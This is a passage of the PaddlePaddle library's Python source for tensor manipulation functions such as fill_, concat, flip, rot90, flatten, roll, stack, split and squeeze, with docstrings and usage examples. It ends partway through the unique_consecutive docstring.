] | 1 | 2022-02-07T05:37:49.000Z | 2022-02-07T05:37:49.000Z | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
] | null | null | null | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from collections import Counter
from ..fluid.layers import core
from ..fluid.layer_helper import LayerHelper
from ..fluid.framework import Variable, OpProtoHolder, in_dygraph_mode, convert_np_dtype_to_dtype_, device_guard, dygraph_only
from ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
from ..fluid.layers.tensor import fill_constant
from ..fluid.layers import utils
import numpy as np
# TODO: define functions to manipulate a tensor
from ..fluid.layers import cast # noqa: F401
from ..fluid.layers import slice # noqa: F401
from ..fluid.layers import transpose # noqa: F401
from ..fluid.layers import unstack # noqa: F401
from ..fluid.layers import scatter_nd # noqa: F401
from ..fluid.layers import shard_index # noqa: F401
from ..fluid.layers.nn import _elementwise_op_in_dygraph
from ..fluid import layers
from ..fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
import paddle
from paddle import _C_ops
from paddle.tensor.attribute import _complex_to_real_dtype, _real_to_complex_dtype
__all__ = []
@dygraph_only
def fill_(x, value):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
This function fill the Tensor with value inplace.
Args:
x(Tensor): ``x`` is the Tensor we want to filled data inplace
value(Scale): ``value`` is the value to be filled in x
Returns:
x(Tensor): Tensor x filled with value inplace
Examples:
.. code-block:: python
import paddle
tensor = paddle.to_tensor([0, 1, 2, 3, 4])
tensor.fill_(0)
print(tensor.tolist()) #[0, 0, 0, 0, 0]
"""
if not isinstance(value, (float, int)):
raise TypeError(
"The type of 'value' must be int or float, but received %s." %
(type(value)))
return _C_ops.fill_any_(x, "value_float",
float(value), "value_int", int(value))
setattr(core.VarBase, 'fill_', fill_)
@dygraph_only
def zero_(x):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
This function fill the Tensor with zero inplace.
Args:
x(Tensor): ``x`` is the Tensor we want to filled with zero inplace
Returns:
x(Tensor): Tensor x filled with zero inplace
Examples:
.. code-block:: python
import paddle
tensor = paddle.to_tensor([0, 1, 2, 3, 4])
tensor.zero_()
print(tensor.tolist()) #[0, 0, 0, 0, 0]
"""
return _C_ops.fill_any_(x, "value_float", 0., "value_int", int(0))
setattr(core.VarBase, 'zero_', zero_)
@dygraph_only
def fill_diagonal_(x, value, offset=0, wrap=False, name=None):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
This function fill the value into the x Tensor's diagonal inplace.
Args:
x(Tensor): ``x`` is the original Tensor
value(Scale): ``value`` is the value to filled in x
offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
wrap(bool,optional): the diagonal 'wrapped' after N columns for tall matrices.
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with value.
Returns type:
dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
x.fill_diagonal_(1.0)
print(x.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
"""
helper = LayerHelper("fill_diagonal_", **locals())
check_type(x, 'X', (Variable), 'fill_diagonal_')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'fill_diagonal_')
check_type(value, 'value', (bool, int, float), 'fill_diagonal_')
check_type(wrap, 'wrap', (bool), 'fill_diagonal_')
inshape = x.shape
inshapeset = set(inshape)
assert len(inshape) >= 2, ('Tensor dims should >= 2 in fill_diagonal_ API')
if len(inshape) > 2:
assert len(inshapeset) == 1, (
'Tensor dims should be equal while input dims > 2 in fill_diagonal_ API'
)
if len(inshape) == 2:
return _C_ops.fill_diagonal_(x, 'value', value, 'offset', offset,
'wrap', wrap)
return _C_ops.fill_diagonal_(x, 'value', value, 'offset', offset, 'wrap',
True)
setattr(core.VarBase, 'fill_diagonal_', fill_diagonal_)
def _fill_diagonal_tensor_impl(x, y, offset=0, dim1=0, dim2=1, inplace=False):
inshape = x.shape
assert dim1 < len(inshape) and dim1 >= -len(inshape), (
'dim1 should between [-rank,rank) in fill_diagonal_tensor_')
assert dim2 < len(inshape) and dim2 >= -len(inshape), (
'dim2 should between [-rank,rank) in fill_diagonal_tensor_')
assert len(inshape) >= 2, (
'Tensor dims should >= 2 in fill_diagonal_tensor_')
dim1 %= len(inshape)
dim2 %= len(inshape)
predshape = []
for i in range(len(inshape)):
if i != dim1 and i != dim2:
predshape.append(inshape[i])
diaglen = min(
min(inshape[dim1], inshape[dim1] + offset),
min(inshape[dim2], inshape[dim2] - offset))
predshape.append(diaglen)
assert tuple(predshape) == tuple(y.shape), (
"the y shape should be {}".format(predshape))
if len(y.shape) == 1:
y = y.reshape([1, -1])
if inplace:
return _C_ops.fill_diagonal_tensor_(x, y, 'dim1', dim1, 'dim2', dim2,
'offset', offset)
return _C_ops.fill_diagonal_tensor(x, y, 'dim1', dim1, 'dim2', dim2,
'offset', offset)
def fill_diagonal_tensor_(x, y, offset=0, dim1=0, dim2=1, name=None):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
This function fill the source Tensor y into the x Tensor's diagonal inplace.
Args:
x(Tensor): ``x`` is the original Tensor
y(Tensor): ``y`` is the Tensor to filled in x
dim1(int,optional): first dimension with respect to which to fill diagonal. Default: 0.
dim2(int,optional): second dimension with respect to which to fill diagonal. Default: 1.
offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with y.
Returns type:
list: dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
y = paddle.ones((3,))
x.fill_diagonal_tensor_(y)
print(x.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
"""
return _fill_diagonal_tensor_impl(
x, y, offset=offset, dim1=dim1, dim2=dim2, inplace=True)
setattr(core.VarBase, 'fill_diagonal_tensor_', fill_diagonal_tensor_)
def fill_diagonal_tensor(x, y, offset=0, dim1=0, dim2=1, name=None):
"""
This function fill the source Tensor y into the x Tensor's diagonal.
Args:
x(Tensor): ``x`` is the original Tensor
y(Tensor): ``y`` is the Tensor to filled in x
dim1(int,optional): first dimension with respect to which to fill diagonal. Default: 0.
dim2(int,optional): second dimension with respect to which to fill diagonal. Default: 1.
offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with y.
Returns type:
list: dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
y = paddle.ones((3,))
nx = x.fill_diagonal_tensor(y)
print(nx.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
"""
return _fill_diagonal_tensor_impl(
x, y, offset=offset, dim1=dim1, dim2=dim2, inplace=False)
setattr(core.VarBase, 'fill_diagonal_tensor', fill_diagonal_tensor)
@dygraph_only
def tolist(x):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
This function translate the paddle.Tensor to python list.
Args:
x(Tensor): ``x`` is the Tensor we want to translate to list
Returns:
list: A list that contain the same value of current Tensor.
Returns type:
list: dtype is same as current Tensor
Examples:
.. code-block:: python
import paddle
t = paddle.to_tensor([0,1,2,3,4])
expectlist = t.tolist()
print(expectlist) #[0, 1, 2, 3, 4]
expectlist = paddle.tolist(t)
print(expectlist) #[0, 1, 2, 3, 4]
"""
return x.numpy().tolist()
setattr(core.VarBase, 'tolist', tolist)
def concat(x, axis=0, name=None):
"""
This OP concatenates the input along the axis.
Args:
x(list|tuple): ``x`` is a Tensor list or Tensor tuple which is with data type bool, float16,
float32, float64, int32, int64, uint8. All the Tensors in ``x`` must have same data type.
axis(int|Tensor, optional): Specify the axis to operate on the input Tensors.
It's a scalar with data type int or a Tensor with shape [1] and data type int32
or int64. The effective range is [-R, R), where R is Rank(x). When ``axis < 0``,
it works the same way as ``axis+R``. Default is 0.
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1, 2, 3],
[4, 5, 6]])
x2 = paddle.to_tensor([[11, 12, 13],
[14, 15, 16]])
x3 = paddle.to_tensor([[21, 22],
[23, 24]])
zero = paddle.full(shape=[1], dtype='int32', fill_value=0)
# When the axis is negative, the real axis is (axis + Rank(x))
# As follow, axis is -1, Rank(x) is 2, the real axis is 1
out1 = paddle.concat(x=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
out3 = paddle.concat(x=[x1, x2], axis=zero)
# out1
# [[ 1 2 3 11 12 13 21 22]
# [ 4 5 6 14 15 16 23 24]]
# out2 out3
# [[ 1 2 3]
# [ 4 5 6]
# [11 12 13]
# [14 15 16]]
"""
return paddle.fluid.layers.concat(input=x, axis=axis, name=name)
def broadcast_tensors(input, name=None):
"""
This OP broadcast a list of tensors following broadcast semantics
.. note::
If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting`.
Args:
input(list|tuple): ``input`` is a Tensor list or Tensor tuple which is with data type bool,
float16, float32, float64, int32, int64. All the Tensors in ``input`` must have same data type.
Currently we only support tensors with rank no greater than 5.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
list(Tensor): The list of broadcasted tensors following the same order as ``input``.
Examples:
.. code-block:: python
import paddle
x1 = paddle.rand([1, 2, 3, 4]).astype('float32')
x2 = paddle.rand([1, 2, 1, 4]).astype('float32')
x3 = paddle.rand([1, 1, 3, 1]).astype('float32')
out1, out2, out3 = paddle.broadcast_tensors(input=[x1, x2, x3])
# out1, out2, out3: tensors broadcasted from x1, x2, x3 with shape [1,2,3,4]
"""
num_inputs = len(input)
if in_dygraph_mode():
return _C_ops.broadcast_tensors(input, num_inputs)
check_type(input, 'input', (list, tuple), 'broadcast_tensors')
if num_inputs < 1:
raise TypeError(
"At least 1 tensor is needed to perform broadcast_tensors")
# Check input types
for id, x in enumerate(input):
check_variable_and_dtype(
x, 'input[' + str(id) + ']',
['bool', 'float32', 'float64', 'int32', 'int64'],
'broadcast_tensors')
if x.dtype != input[0].dtype:
raise TypeError(
"All the Tensors in the input must have the same data type.")
# Check bcast semantics
output_shape_r_last_tensor_index = []
output_shape_r = []
# Use while loop due to weird behaviour of "range()"
j = 0
while j < len(input):
tensor = input[j]
shape = list(reversed(tensor.shape))
i = 0
while i < len(shape):
if len(output_shape_r) <= i:
output_shape_r.append(shape[i])
output_shape_r_last_tensor_index.append(j)
else:
invalid = (output_shape_r[i] != shape[i] and
output_shape_r[i] != 1 and shape[i] != 1)
if invalid:
last_index = output_shape_r_last_tensor_index[i]
raise TypeError(
"Input tensors to broadcast_tensors does not follow bcast semantics"
"Tensor {last_index} conflicts with Tensor {j} in reversed dimension {i}"
)
if output_shape_r[i] <= shape[i]:
output_shape_r[i] = shape[i]
output_shape_r_last_tensor_index[i] = j
i += 1 # while i < len(shape)
j += 1 # while j < len(input)
helper = LayerHelper('broadcast_tensors', **locals())
i = 0
out = []
while i < num_inputs:
out.append(
helper.create_variable_for_type_inference(dtype=helper.input_dtype(
)))
i += 1
inputs = {'X': input}
helper.append_op(
type='broadcast_tensors', inputs=inputs, outputs={'Out': out},
attrs={})
return out
def flip(x, axis, name=None):
"""
Reverse the order of a n-D tensor along given axis in axis.
Args:
x (Tensor): A Tensor(or LoDTensor) with shape :math:`[N_1, N_2,..., N_k]` . The data type of the input Tensor x
should be float32, float64, int32, int64, bool.
axis (list|tuple|int): The axis(axes) to flip on. Negative indices for indexing from the end are accepted.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: Tensor or LoDTensor calculated by flip layer. The data type is same with input x.
Examples:
.. code-block:: python
import paddle
import numpy as np
image_shape=(3, 2, 2)
x = np.arange(image_shape[0] * image_shape[1] * image_shape[2]).reshape(image_shape)
x = x.astype('float32')
img = paddle.to_tensor(x)
tmp = paddle.flip(img, [0,1])
print(tmp) # [[[10,11],[8, 9]], [[6, 7],[4, 5]], [[2, 3],[0, 1]]]
out = paddle.flip(tmp,-1)
print(out) # [[[11,10],[9, 8]], [[7, 6],[5, 4]], [[3, 2],[1, 0]]]
"""
if isinstance(axis, int):
axis = [axis]
if in_dygraph_mode():
return _C_ops.flip(x, "axis", axis)
helper = LayerHelper("flip", **locals())
check_type(x, 'X', (Variable), 'flip')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
'flip')
check_type(axis, 'axis', (list, tuple), 'flip')
if name is None:
out = helper.create_variable_for_type_inference(dtype)
else:
out = helper.create_variable(name=name, dtype=dtype, persistable=False)
helper.append_op(
type="flip",
inputs={"X": x},
outputs={"Out": out},
attrs={"axis": axis})
return out
def rot90(x, k=1, axes=[0, 1], name=None):
"""
Rotate a n-D tensor by 90 degrees. The rotation direction and times are specified by axes. Rotation direction is from axes[0] towards axes[1] if k > 0, and from axes[1] towards axes[0] for k < 0.
Args:
x (Tensor): The input Tensor(or LoDTensor). The data type of the input Tensor x
should be float16, float32, float64, int32, int64, bool. float16 is only supported on gpu.
k (int, optional): Direction and number of times to rotate, default value: 1.
axes (list|tuple, optional): Axes to rotate, dimension must be 2. default value: [0, 1].
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: Tensor or LoDTensor calculated by rot90 layer. The data type is same with input x.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(4)
data = paddle.reshape(data, (2, 2))
print(data)
#[[0, 1],
# [2, 3]]
y = paddle.rot90(data, 1, [0, 1])
print(y)
#[[1, 3],
# [0, 2]]
y= paddle.rot90(data, -1, [0, 1])
print(y)
#[[2, 0],
# [3, 1]]
data2 = paddle.arange(8)
data2 = paddle.reshape(data2, (2,2,2))
print(data2)
#[[[0, 1],
# [2, 3]],
# [[4, 5],
# [6, 7]]]
y = paddle.rot90(data2, 1, [1, 2])
print(y)
#[[[1, 3],
# [0, 2]],
# [[5, 7],
# [4, 6]]]
"""
helper = LayerHelper("rot90", **locals())
check_type(x, 'X', (Variable), 'rot90')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
'rot90')
check_type(axes, 'axes', (list, tuple), 'rot90')
input_total_dims = len(x.shape)
total_rot_dims = len(axes)
if total_rot_dims != 2:
raise ValueError("expected total rotation axes == 2, but got axes = {}".
format(total_rot_dims))
if input_total_dims < 2:
raise ValueError("expected total dims >= 2, but got total dims = {}".
format(input_total_dims))
if not (axes[0] != axes[1] and abs(axes[0] - axes[1]) != input_total_dims):
raise ValueError(
"expected rotation axes to be different, but got axis0 = {}, and axis1 = {}".
format(axes[0], axes[1]))
if not (axes[0] < input_total_dims and axes[0] >= -input_total_dims):
raise ValueError("Rotation axis0 out of range, axis0 = {}".format(axes[
0]))
if not (axes[1] < input_total_dims and axes[1] >= -input_total_dims):
raise ValueError("Rotation axis1 out of range, axis1 = {}".format(axes[
1]))
k %= 4
if k == 0:
return x
if k == 2:
return flip(flip(x, axes[0]), axes[1])
axes_list = list(range(0, input_total_dims))
(axes_list[axes[0]], axes_list[axes[1]]) = (axes_list[axes[1]],
axes_list[axes[0]])
if k == 1:
return transpose(flip(x, axes[1]), axes_list)
else:
# k == 3
return flip(transpose(x, axes_list), axes[1])
def flatten(x, start_axis=0, stop_axis=-1, name=None):
r"""
**Flatten op**
Flattens a contiguous range of axes in a tensor according to start_axis and stop_axis.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version, please
use `Tensor.clone` like ``flatten_clone_x = x.flatten().clone()``.
For Example:
.. code-block:: text
Case 1:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 1
end_axis = 2
We get:
Out.shape = (3, 1000 * 100, 2)
Case 2:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 0
stop_axis = -1
We get:
Out.shape = (3 * 100 * 100 * 4)
Args:
x (Tensor): A tensor of number of dimentions >= axis. A tensor with data type float32,
float64, int8, int32, int64, uint8.
start_axis (int): the start axis to flatten
stop_axis (int): the stop axis to flatten
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: A tensor with the contents of the input tensor, with input \
axes flattened by indicated start axis and end axis. \
A Tensor with data type same as input x.
Raises:
ValueError: If x is not a Tensor.
ValueError: If start_axis or stop_axis is illegal.
Examples:
.. code-block:: python
import paddle
image_shape=(2, 3, 4, 4)
x = paddle.arange(end=image_shape[0] * image_shape[1] * image_shape[2] * image_shape[3])
img = paddle.reshape(x, image_shape)
out = paddle.flatten(img, start_axis=1, stop_axis=2)
# out shape is [2, 12, 4]
# out shares data with img in dygraph mode
img[0, 0, 0, 0] = -1
print(out[0, 0, 0]) # [-1]
"""
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Tensor")
if not in_dygraph_mode():
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int8', 'int32', 'int64', 'uint8'],
'flatten')
x_dim = len(x.shape)
if not (isinstance(start_axis, int)) or (
start_axis > x_dim - 1) or start_axis < -x_dim:
raise ValueError(
"The start_axis should be a int, and in range [-rank(x), rank(x))")
if not (isinstance(stop_axis, int)) or (
stop_axis > x_dim - 1) or stop_axis < -x_dim:
raise ValueError(
"The stop_axis should be a int, and in range [-rank(x), rank(x))")
if start_axis < 0:
start_axis = start_axis + x_dim
if stop_axis < 0:
stop_axis = stop_axis + x_dim
if start_axis > stop_axis:
raise ValueError("The stop_axis should be larger than stat_axis")
if in_dygraph_mode():
dy_out, _ = _C_ops.flatten_contiguous_range(x, 'start_axis', start_axis,
'stop_axis', stop_axis)
return dy_out
helper = LayerHelper('flatten', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='flatten_contiguous_range',
inputs={"X": x},
outputs={'Out': out,
'XShape': x_shape},
attrs={"start_axis": start_axis,
"stop_axis": stop_axis})
return out
@inplace_apis_in_dygraph_only
def flatten_(x, start_axis=0, stop_axis=-1, name=None):
"""
Inplace version of ``flatten`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_flatten`.
"""
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Tensor")
x_dim = len(x.shape)
if not (isinstance(start_axis, int)) or (
start_axis > x_dim - 1) or start_axis < -x_dim:
raise ValueError(
"The start_axis should be a int, and in range [-rank(x), rank(x))")
if not (isinstance(stop_axis, int)) or (
stop_axis > x_dim - 1) or stop_axis < -x_dim:
raise ValueError(
"The stop_axis should be a int, and in range [-rank(x), rank(x))")
if start_axis < 0:
start_axis = start_axis + x_dim
if stop_axis < 0:
stop_axis = stop_axis + x_dim
if start_axis > stop_axis:
raise ValueError("The stop_axis should be larger than stat_axis")
dy_out, _ = _C_ops.flatten_contiguous_range_(x, 'start_axis', start_axis,
'stop_axis', stop_axis)
return dy_out
def roll(x, shifts, axis=None, name=None):
"""
Roll the `x` tensor along the given axis(axes). With specific 'shifts', Elements that
roll beyond the last position are re-introduced at the first according to 'shifts'.
If a axis is not specified,
the tensor will be flattened before rolling and then restored to the original shape.
Args:
x (Tensor): The x tensor as input.
shifts (int|list|tuple): The number of places by which the elements
of the `x` tensor are shifted.
axis (int|list|tuple|None): axis(axes) along which to roll.
Returns:
Tensor: A Tensor with same data type as `x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1.0, 2.0, 3.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 9.0]])
out_z1 = paddle.roll(x, shifts=1)
print(out_z1)
#[[9. 1. 2.]
# [3. 4. 5.]
# [6. 7. 8.]]
out_z2 = paddle.roll(x, shifts=1, axis=0)
print(out_z2)
#[[7. 8. 9.]
# [1. 2. 3.]
# [4. 5. 6.]]
"""
origin_shape = x.shape
if type(shifts) == int:
shifts = [shifts]
if type(axis) == int:
axis = [axis]
len_origin_shape = len(origin_shape)
if axis is not None:
for i in range(len(axis)):
if axis[i] >= len_origin_shape or axis[i] < -len_origin_shape:
raise ValueError(
"axis is out of range, it should be in range [{}, {}), but received {}".
format(-len_origin_shape, len_origin_shape, axis))
else:
axis = []
if in_dygraph_mode():
return _C_ops.roll(x, 'axis', axis, 'shifts', shifts)
helper = LayerHelper("roll", **locals())
check_type(axis, 'axis', (list, tuple), 'roll')
out = helper.create_variable_for_type_inference(x.dtype)
if isinstance(shifts, Variable):
helper.append_op(
type='roll',
inputs={'X': x,
"ShiftsTensor": shifts},
outputs={'Out': out},
attrs={'axis': axis})
else:
check_type(shifts, 'shifts', (list, tuple), 'roll')
helper.append_op(
type='roll',
inputs={'X': x},
outputs={'Out': out},
attrs={'axis': axis,
'shifts': shifts})
return out
def stack(x, axis=0, name=None):
"""
This OP stacks all the input tensors ``x`` along ``axis`` dimemsion.
All tensors must be of the same shape and same dtype.
For example, given N tensors of shape [A, B], if ``axis == 0``, the shape of stacked
tensor is [N, A, B]; if ``axis == 1``, the shape of stacked
tensor is [A, N, B], etc.
.. code-block:: text
Case 1:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 0
Output:
Out.dims = [3, 1, 2]
Out.data =[ [ [1.0, 2.0] ],
[ [3.0, 4.0] ],
[ [5.0, 6.0] ] ]
Case 2:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 1 or axis = -2 # If axis = -2, axis = axis+ndim(x[0])+1 = -2+2+1 = 1.
Output:
Out.shape = [1, 3, 2]
Out.data =[ [ [1.0, 2.0]
[3.0, 4.0]
[5.0, 6.0] ] ]
Args:
x (list[Tensor]|tuple[Tensor]): Input ``x`` can be a ``list`` or ``tuple`` of tensors, the Tensors in ``x``
must be of the same shape and dtype. Supported data types: float32, float64, int32, int64.
axis (int, optional): The axis along which all inputs are stacked. ``axis`` range is ``[-(R+1), R+1)``,
where ``R`` is the number of dimensions of the first input tensor ``x[0]``.
If ``axis < 0``, ``axis = axis+R+1``. The default value of axis is 0.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: The stacked tensor with same data type as input.
Example:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1.0, 2.0]])
x2 = paddle.to_tensor([[3.0, 4.0]])
x3 = paddle.to_tensor([[5.0, 6.0]])
out = paddle.stack([x1, x2, x3], axis=0)
print(out.shape) # [3, 1, 2]
print(out)
# [[[1., 2.]],
# [[3., 4.]],
# [[5., 6.]]]
"""
return layers.stack(x, axis, name)
def split(x, num_or_sections, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
num_or_sections (int|list|tuple): If ``num_or_sections`` is an int, then ``num_or_sections``
indicates the number of equal sized sub-Tensors that the ``x`` will be divided into.
If ``num_or_sections`` is a list or tuple, the length of it indicates the number of
sub-Tensors and the elements in it indicate the sizes of sub-Tensors' dimension orderly.
The length of the list must not be larger than the ``x`` 's size of specified ``axis``.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
If :math::`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import paddle
# x is a Tensor of shape [3, 9, 5]
x = paddle.rand([3, 9, 5])
out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=1)
print(out0.shape) # [3, 3, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 3, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, 4], axis=1)
print(out0.shape) # [3, 2, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 4, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, -1], axis=1)
print(out0.shape) # [3, 2, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 4, 5]
# axis is negative, the real axis is (rank(x) + axis)=1
out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=-2)
print(out0.shape) # [3, 3, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 3, 5]
"""
return paddle.fluid.layers.split(
input=x, num_or_sections=num_or_sections, dim=axis, name=name)
def squeeze(x, axis=None, name=None):
"""
This OP will squeeze the dimension(s) of size 1 of input tensor x's shape.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version,
please use `Tensor.clone` like ``squeeze_clone_x = x.squeeze().clone()``.
If axis is provided, it will remove the dimension(s) by given axis that of size 1.
If the dimension of given axis is not of size 1, the dimension remain unchanged.
If axis is not provided, all dims equal of size 1 will be removed.
.. code-block:: text
Case1:
Input:
x.shape = [1, 3, 1, 5] # If axis is not provided, all dims equal of size 1 will be removed.
axis = None
Output:
out.shape = [3, 5]
Case2:
Input:
x.shape = [1, 3, 1, 5] # If axis is provided, it will remove the dimension(s) by given axis that of size 1.
axis = 0
Output:
out.shape = [3, 1, 5]
Case4:
Input:
x.shape = [1, 3, 1, 5] # If the dimension of one given axis (3) is not of size 1, the dimension remain unchanged.
axis = [0, 2, 3]
Output:
out.shape = [3, 5]
Case4:
Input:
x.shape = [1, 3, 1, 5] # If axis is negative, axis = axis + ndim (number of dimensions in x).
axis = [-2]
Output:
out.shape = [1, 3, 5]
Args:
x (Tensor): The input Tensor. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple, optional): An integer or list/tuple of integers, indicating the dimensions to be squeezed. Default is None.
The range of axis is :math:`[-ndim(x), ndim(x))`.
If axis is negative, :math:`axis = axis + ndim(x)`.
If axis is None, all the dimensions of x of size 1 will be removed.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Squeezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([5, 1, 10])
output = paddle.squeeze(x, axis=1)
print(x.shape) # [5, 1, 10]
print(output.shape) # [5, 10]
# output shares data with x in dygraph mode
x[0, 0, 0] = 10.
print(output[0, 0]) # [10.]
"""
if axis is None:
axis = []
elif isinstance(axis, int):
axis = [axis]
elif isinstance(axis, tuple):
axis = list(axis)
return layers.squeeze(x, axis, name)
@inplace_apis_in_dygraph_only
def squeeze_(x, axis=None, name=None):
"""
Inplace version of ``squeeze`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_squeeze`.
"""
if axis is None:
axis = []
elif isinstance(axis, int):
axis = [axis]
elif isinstance(axis, tuple):
axis = list(axis)
out, _ = _C_ops.squeeze2_(x, 'axes', axis)
return out
def unique_consecutive(x,
return_inverse=False,
return_counts=False,
axis=None,
dtype="int64",
name=None):
r"""
Eliminates all but the first element from every consecutive group of equivalent elements.
.. note:: This function is different from :func:`paddle.unique` in the sense that this function
only eliminates consecutive duplicate values. This semantics is similar to `std::unique` in C++.
Args:
x(Tensor): the input tensor, it's data type should be float32, float64, int32, int64.
return_inverse(bool, optional): If True, also return the indices for where elements in
the original input ended up in the returned unique consecutive tensor. Default is False.
return_counts(bool, optional): If True, also return the counts for each unique consecutive element.
Default is False.
axis(int, optional): The axis to apply unique consecutive. If None, the input will be flattened.
Default is None.
dtype(np.dtype|str, optional): The data type `inverse` tensor: int32 or int64.
Default: int64.
name(str, optional): Name for the operation. For more information, please refer to
:ref:`api_guide_Name`. Default is None.
Returns:
tuple: (out, inverse, counts). `out` is the unique consecutive tensor for `x`. `inverse` is provided only if `return_inverse` is True. `counts` is provided only if `return_counts` is True.
Example:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 1, 2, 2, 3, 1, 1, 2])
output = paddle.unique_consecutive(x) #
np_output = output.numpy() # [1 2 3 1 2]
_, inverse, counts = paddle.unique_consecutive(x, return_inverse=True, return_counts=True)
np_inverse = inverse.numpy() # [0 0 1 1 2 3 3 4]
np_counts = inverse.numpy() # [2 2 1 2 1]
x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3], [2, 1, 3]])
output = paddle.unique_consecutive(x, axis=0) #
